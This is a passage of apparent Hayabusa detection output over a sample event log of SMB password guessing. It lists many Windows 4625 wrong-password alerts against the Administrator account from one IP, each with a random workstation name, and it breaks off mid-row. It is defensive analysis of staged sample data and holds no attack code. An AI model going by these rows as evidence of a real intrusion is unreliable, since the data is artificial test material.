NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pq1GWcKzSHSP28hk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: agCtM0s62zXPop0y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.430 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dVvglj7RtxrBUeXi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pMbS0sIpbFDqJvMW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldO0cAZ54BRHHDyz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OmJH2QWFPiYarKh5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5fCiyHtI0OTo8pBO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e3vkVuU43tsYHUSj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.714 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3w21sFOu2u7FTDZM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bk7eaqQNK1CEgqoj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rv5joLgkm3QUYPyb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4l15usDM7jggwEyw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p9QpOvgDmiOgzQqb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dqyr8tb9TrO1aJNe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hI1bzjixP8eOdDbw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pMTAp20wXS3d1OCk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qrQGfxInmlgPqGtd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZcsMMQbsnUdyLJWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8oRYZqBBsq9GyApI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0TAhib6p8fY5iOgI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FerGHj9abOe6ehZn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.362 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kN4B4KLpXbyKZzGv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HJtoyRfP38T3KToO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rkI5hLApUWhGnKIs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZCPSO4JLjMur2Eow : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHmrv2xFuq7TyIQN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8SqYq3msNfFh24lg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YE0a2Bypzc1MMdGn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ojgIg88VK6hB72PI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ehLrf2GoAhY3Rf7Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ccfgpjwpis15B4gY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vysSf3DsOxQf5fVd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IEp88cEeiNw4IQsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5PXDJPzw0gPdlCiH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mwoe9IgWx2UZ7Iuu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3eW0nFDUwKFzoQIw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q0i0p5QxJ4ykYYJt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VsxqWAnd6j2CdyB3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y5qdy80mtFWl199k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ce0d84uBK4t2sqR3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b4dZYZEW1VijjwHN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZmqGJWbeap5dv0gC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zaNUqChgVSbDkFQu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.319 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B4PDZ55it0V4QGnM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TQxXVB8Aj5gaw2f2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vzDeZtgSJoH74GYk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iNAFsZraFvw67WWR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aVdnbyzWqk58rOW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WjUH2PopXCrrPzqi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ylmV2z3WjTWsTpyu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.654 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8qBKZTYRTKuEAgS8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JvekO4A5f6QK2ynZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LDUqydSeA1guOjIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o71TltsJDyOIuLQb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NXT3MSCes42dVCNn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FGXiWeT8Evr6G70M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V2RarzrnGgcLaseH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u3k7dXu9o1vMkhby : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EDBt76dmYnPstFWw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4yjzMC7cw0fe7gjS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eQOWCM7KP68DZTX9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kn9WWWqCIwfrPbie : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AQcamLSzsXOjP6FL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.278 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6R6ZMRoYkAPB35Bq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ubqnZm0jmHNFCHrM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7ORQ8vL1oo6CkJXK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rDPl1SSddrWEs979 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VrK7fENAr1lxFr9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.633 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wu4djhEVSMYBOmjF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e0NOdXhEkW6MskA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.715 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nqxLHaOtkHHNAa1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NCrCf73NtEpk5DUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YVFm1epksVGO1nFY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YmVehuMHvh5kVqRW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sERZrNUHsKVEShCb : IP Address: 192.168.198.149 : AuthPackage: 